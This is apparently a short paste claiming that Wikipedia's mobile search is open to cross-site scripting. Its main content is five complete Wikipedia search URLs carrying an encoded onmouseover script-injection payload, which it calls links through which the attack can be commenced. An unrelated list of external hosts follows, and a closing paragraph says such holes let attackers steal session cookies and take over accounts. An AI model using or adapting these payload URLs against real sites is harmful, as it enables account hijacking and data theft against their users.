Wikipedia Vulnerability

1. Wikipedia, the worlds largest 'biased' information portal is vulnerable to XSS or Cross Site Scripting attack. Following are the links through which the attack can be commenced.
2.  
3.  
4. http://en.wikipedia.org/w/index.php?search=%27%20onmouseover%3dprompt%28952154%29%20bad%3d%27&title=Special:Search&useformat=mobile
5.  
6. http://en.wikipedia.org/w/index.php?fulltext=Search&ns0=1&redirs=0&search=%27%20onmouseover%3dprompt%28955575%29%20bad%3d%27&title=Special:Search&useformat=mobile
7.  
8. http://en.wikipedia.org/w/index.php?fulltext=Search&ns0=1&redirs=1&search=%27%20onmouseover%3dprompt%28941380%29%20bad%3d%27&title=Special:Search&useformat=mobile
9.  
10. http://en.wikipedia.org/w/index.php?fulltext=Search&redirs=0&search=%27%20onmouseover%3dprompt%28983464%29%20bad%3d%27&title=Special:Search&useformat=mobile
11.  
12. http://en.wikipedia.org/w/index.php?advanced=1&fulltext=Search&ns0=1&ns1=1&ns10=1&ns100=1&ns101=1&ns108=1&ns109=1&ns11=1&ns12=1&ns13=1&ns14=1&ns15=1&ns2=1&ns3=1&ns4=1&ns5=1&ns6=1&ns7=1&ns8=1&ns9=1&redirs=1&search=%27%20onmouseover%3dprompt%28980283%29%20bad%3d%27&title=Special:Search&useformat=mobile
13.  
14.  
15. Wikipedia's list of external hosts:
16. creativecommons.org
17. bits.wikimedia.org
18. secure.wikimedia.org
19. wikimediafoundation.org
20. www.mediawiki.org
21. geoiplookup.wikimedia.org
22. upload.wikimedia.org
23. www.freenode.net
24. www.wikimediafoundation.org
25. www.contactmusic.com
26. www.belfasttelegraph.co.uk
27. enjoyment.independent.co.uk
28. archives.cnn.com
29. blackstarnews.com
30. www.polkonline.com
31. www.askmen.com
32. www.addictioninfo.org
33. metromix.chicagotribune.com
34. paralleluniverse.msn.com
35. web.archive.org
36. www.hollywoodreporter.com
37. www.thewrap.com
38. www.satansalley.com
39. www.mediablvd.com
40. news.yahoo.com
41. www.cinemablend.com
42. www.godisageek.com
43. www.sfgate.com
44. www.premiere.com
45. people.aol.com
46. www.people.com
47. www.monk.com
48. www.youtube.com
49. www.imdb.com
50. ar.wikipedia.org
51. bg.wikipedia.org
52. cs.wikipedia.org
53. cy.wikipedia.org
54. da.wikipedia.org
55. de.wikipedia.org
56. dv.wikipedia.org
57. et.wikipedia.org
58. el.wikipedia.org
59. es.wikipedia.org
60. fa.wikipedia.org
61. fr.wikipedia.org
62. hr.wikipedia.org
63. id.wikipedia.org
64. it.wikipedia.org
65. he.wikipedia.org
66. jv.wikipedia.org
67. lv.wikipedia.org
68. hu.wikipedia.org
69. ms.wikipedia.org
70. mn.wikipedia.org
71. nl.wikipedia.org
72. ja.wikipedia.org
73. no.wikipedia.org
74. pl.wikipedia.org
75. pt.wikipedia.org
76. ro.wikipedia.org
77. ru.wikipedia.org
78. sq.wikipedia.org
79. simple.wikipedia.org
80. sk.wikipedia.org
81. sr.wikipedia.org
82. fi.wikipedia.org
83. sv.wikipedia.org
84. tl.wikipedia.org
85. th.wikipedia.org
86. tr.wikipedia.org
87. uk.wikipedia.org
88. zh.wikipedia.org
89.  
90.  
91. What is XSS or Cross Site Scripting - Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into a vulnerable link to fool a user in order to gather data from them. A Hacker can steal the session cookie and take over the account, impersonating the user. It is also possible to modify the content of the page presented to the user.